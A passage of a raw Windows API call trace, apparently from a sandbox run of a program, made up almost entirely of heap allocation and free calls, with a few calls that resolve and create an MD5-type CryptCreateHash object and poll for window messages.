0x2e78a50 [0222.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0222.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0222.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0222.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0222.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0222.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0222.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0222.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0222.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0222.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0222.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0222.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0222.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0222.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0222.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0222.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0222.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0222.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0222.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0222.367] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0222.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0222.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0222.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0222.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0222.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0222.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0222.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0222.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0222.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0222.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0222.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0222.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0222.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0222.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0222.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0222.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0222.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0222.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0222.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0222.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0222.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0222.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0222.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0222.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0222.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0222.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0222.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0222.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0222.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0222.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0222.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0222.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0222.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0222.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0222.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0222.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0222.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0222.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0222.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0222.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0222.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0222.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0222.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0222.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0222.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0222.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0222.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0222.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0222.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0222.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0222.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0222.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0222.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0222.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0222.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0222.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0222.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51478, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0222.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0222.369] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0222.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0222.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0222.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0222.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0222.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0222.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0222.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0222.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0222.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0222.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0222.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0222.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0222.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0222.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0222.370] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0222.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0222.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0222.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0222.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0222.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0222.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0222.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0222.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0222.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0222.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0222.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0222.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0222.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0222.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0222.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0222.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0222.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0222.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0222.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0222.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0222.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0222.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0222.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0222.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0222.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0222.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0222.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0222.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0222.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0222.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0222.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0222.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0222.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0222.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0222.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0222.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0222.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0222.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0222.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0222.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0222.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0222.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0222.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0222.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0222.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0222.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0222.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0222.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0222.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0222.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0222.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0222.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0222.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0222.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0222.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0222.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0222.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0222.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0222.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0222.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0222.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0222.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0222.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0222.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0222.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0222.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0222.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0222.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0222.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0222.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0222.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0222.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0222.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0222.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0222.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0222.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0222.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0222.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0222.374] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0222.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0222.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0222.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0222.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0222.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0222.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0222.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0222.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0222.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0222.374] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0222.374] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0222.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0222.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0222.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0222.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0222.375] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0222.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0222.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0222.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0222.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0222.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0222.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0222.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0222.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0222.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0222.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0222.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fc8 [0222.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0222.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0222.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0222.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0222.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0222.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0222.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0222.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0222.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0222.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0222.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0222.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0222.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0222.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0222.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0222.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0222.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0222.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0222.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0222.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0222.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0222.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0222.377] HeapFree (in: 